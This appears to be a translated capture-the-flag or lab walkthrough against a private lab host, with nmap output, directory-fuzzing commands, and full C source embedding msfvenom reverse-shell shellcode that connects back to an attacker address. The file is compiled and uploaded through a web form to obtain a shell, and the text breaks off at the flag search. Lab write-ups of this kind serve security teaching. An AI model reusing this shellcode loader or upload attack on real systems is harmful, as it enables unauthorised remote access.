Command: `nmap -A -Pn 192.168.243.171`

Initial Nmap output:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 01:03 EDT
Nmap scan report for 192.168.243.171
Host is up (0.21s latency).
Not shown: 948 filtered tcp ports (no-response), 49 filtered tcp ports (admin-prohibited)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 0c:f7:57:49:fc:d4:4e:73:97:2c:25:a2:6a:36:5b:2c (RSA)
|   256 87:35:fd:bc:0a:69:ff:e7:7f:4c:54:c7:bd:29:1d:b9 (ECDSA)
|_  256 2d:8b:f2:70:c4:57:44:62:d5:80:d6:0b:6e:31:a9:75 (ED25519)
80/tcp   open   http       Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
|_http-server-header: Apache/2.4.37 (centos)
9090/tcp closed zeus-admin
Aggressive OS guesses: Linux 4.4 (92%), Linux 4.9 (91%), Linux 3.10 - 3.12 (90%), Linux 4.0 (89%), Linux 3.10 - 3.16 (88%), Linux 3.11 - 4.1 (88%), Linux 2.6.32 (88%), Linux 3.4 (88%), Linux 3.5 (88%), Linux 4.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 9090/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.172
2   205.23 ms 192.168.243.171
```

The interesting service is port 80 (Apache httpd 2.4.37 on CentOS).
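The `|_http-title` line above is hard to read because Nmap prints every non-ASCII byte of the title as a `\xNN` escape. The following Python helper is an added example, not part of the original writeup; it reverses that escaping and decodes the title as UTF-8. The sample line is a constructed copy of the one in the scan output.

```python
import re

# Constructed sample: the |_http-title line exactly as Nmap prints it,
# with every non-ASCII byte escaped as \xNN (copied from the scan above).
SAMPLE_LINE = (r"|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 "
               r"Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8"
               r"\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5")

_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")


def unescape_nmap(s: str) -> bytes:
    """Reverse Nmap's \\xNN escaping and return the original raw bytes."""
    out = bytearray()
    pos = 0
    for m in _ESC.finditer(s):
        out += s[pos:m.start()].encode("latin-1")  # literal ASCII text
        out.append(int(m.group(1), 16))             # one escaped byte
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return bytes(out)


def decode_http_title(line: str, encoding: str = "utf-8") -> str:
    """Extract and decode the title from an Nmap http-title script line."""
    prefix = "|_http-title:"
    if not line.startswith(prefix):
        raise ValueError("not an http-title line")
    raw = unescape_nmap(line[len(prefix):].strip())
    # errors="replace" keeps the call safe if the site used another charset
    return raw.decode(encoding, errors="replace")


if __name__ == "__main__":
    print(decode_http_title(SAMPLE_LINE))
```

The decoded title is the stock CentOS "Apache HTTP server test page" in Chinese, confirming that port 80 serves only the default page before any fuzzing.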

Visiting port 80 only shows the default Apache page, so the possible pages have to be fuzzed. Strangely, several wordlists with gobuster and ffuf did not find the target page.

```shell
ffuf -u http://192.168.243.171/FUZZ -w /usr/share/dirb/wordlists/big.txt

ffuf -u http://192.168.243.171/FUZZ -w /usr/share/wordlists/dirb/common.txt

feroxbuster -u http://192.168.243.171/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
```

None of the three commands above found what was needed; in the end gobuster with an explicit file extension found it:

```shell
gobuster dir -u http://192.168.243.171 -w /usr/share/wordlists/dirb/common.txt -e -x html
```

01.png

Visit: http://192.168.243.171/upload.html

02.png

There is an upload function. As required, write the following code (refer to the textbook, p. 404):

```c
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>

// To compile:
// gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
// gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl

// msfvenom -p linux/x64/shell_reverse_tcp  LHOST=192.168.49.243 LPORT=80 -f c
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x00\x50\xc0\xa8\x31\xf3\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int main(void)
{
        printf("I love programming.");

        // Fork a child process; the child runs the payload, the parent carries on
        if (fork() == 0)
        {
                // Execute the shellcode in the child process
                intptr_t pagesize = sysconf(_SC_PAGESIZE);

                // Mark the page holding buf as executable (buf lives in writable,
                // non-executable data, so this is required)
                if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
                        // Handle error
                        perror("mprotect");
                        return -1;
                }

                // Cast the buffer to a function pointer and call it
                int (*ret)() = (int(*)())buf;
                ret();
        }
        else
        {
                printf("[Hijacked] Returning from function...\n");
        }
        // This shouldn't really execute
        printf("[Hijacked] Returning from main...\n");
        return 3;
}
```

Compile command: `gcc -Wall -fPIC -z execstack -o rev.elf rev.c`

Upload it and receive the returned shell:

03.png

Spawn a pseudo-terminal:

04.png

Find the flag: